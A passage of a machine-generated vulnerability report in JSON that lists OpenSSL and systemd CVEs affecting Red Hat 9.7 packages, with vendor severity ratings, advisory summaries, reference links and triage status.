          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-28390",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyTransportRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyTransportRecipientInfo with\nRSA-OAEP encryption is processed, the optional parameters field of\nRSA-OAEP SourceFunc algorithm identifier is examined without checking\nfor its presence. This results in a NULL pointer dereference if the field\nis missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28390"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28390"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28390"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-05-12T13:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-29111",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        269
      ],
      "description": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On versions v249 and older the effect is not an assert but a stack overwrite with attacker-controlled content. From version v250 onward this is not possible, as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.",
      "recommendation": "Upgrade systemd to version 252-55.el9_7.9; Upgrade systemd-libs to version 252-55.el9_7.9; Upgrade systemd-pam to version 252-55.el9_7.9; Upgrade systemd-rpm-macros to version 252-55.el9_7.9",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-29111"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13677"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-29111"
        },
        {
          "url": "https://bugzilla.redhat.com/2450505"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-13677.html"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-29111.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-13677.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29111"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29111"
        }
      ],
      "published": "2026-03-23T22:16:26+00:00",
      "updated": "2026-04-15T16:44:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "252-55.el9_7.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-31789",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31789"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31789"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-05-12T13:17:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-31790",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: Applications using RSASVE key encapsulation to establish\na secret encryption key can send contents of an uninitialized memory buffer to\na malicious peer.\n\nImpact summary: The uninitialized buffer might contain sensitive data from the\nprevious execution of the application process which leads to sensitive data\nleakage to an attacker.\n\nRSA_public_encrypt() returns the number of bytes written on success and -1\non error. The affected code tests only whether the return value is non-zero.\nAs a result, if RSA encryption fails, encapsulation can still return success to\nthe caller, set the output lengths, and leave the caller to use the contents of\nthe ciphertext buffer as if a valid KEM ciphertext had been produced.\n\nIf applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an\nattacker-supplied invalid RSA public key without first validating that key,\nthen this may cause stale or uninitialized contents of the caller-provided\nciphertext buffer to be disclosed to the attacker in place of the KEM\nciphertext.\n\nAs a workaround calling EVP_PKEY_public_check() or\nEVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate\nthe issue.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31790"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31790"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-vgxx-5xj5-q97x"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31790"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31790"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-05-12T13:17:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.0.7-8.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7",
